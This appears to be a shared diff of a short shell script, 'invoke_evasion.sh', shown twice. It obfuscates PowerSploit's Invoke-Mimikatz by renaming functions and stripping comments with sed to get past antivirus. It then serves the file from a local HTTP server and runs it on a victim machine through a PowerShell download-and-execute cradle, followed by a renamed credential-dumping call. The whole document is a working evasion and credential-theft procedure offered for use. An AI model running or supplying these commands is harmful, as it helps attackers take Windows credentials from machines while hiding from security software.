misuchiru03 · March 14, 2019 21:00
diff --git a/invoke_evasion.sh b/invoke_evasion.sh
 # AV Bypass to run Mimikatz
 # From: https://www.blackhillsinfosec.com/?p=5555

 # Server side:
 wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
 sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
 sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
 sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
 sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
 sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
 python -m SimpleHTTPServer 3615

 # Client-side: 
 Invoke-Expression (New-Object Net.Webclient).downloadstring('http://x.x.x.x:3615/Invoke-Mimikatz.ps1')
 Invoke-Mimidogz
	# AV Bypass to run Mimikatz
	# From: https://www.blackhillsinfosec.com/?p=5555

	# Server side:
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
	sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
	sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
	sed -i -e 's/^[[:space:]]#.$//g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
	sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
	sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
	sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
	python -m SimpleHTTPServer 3615

	# Client-side:
	Invoke-Expression (New-Object Net.Webclient).downloadstring('http://x.x.x.x:3615/Invoke-Mimikatz.ps1')
	Invoke-Mimidogz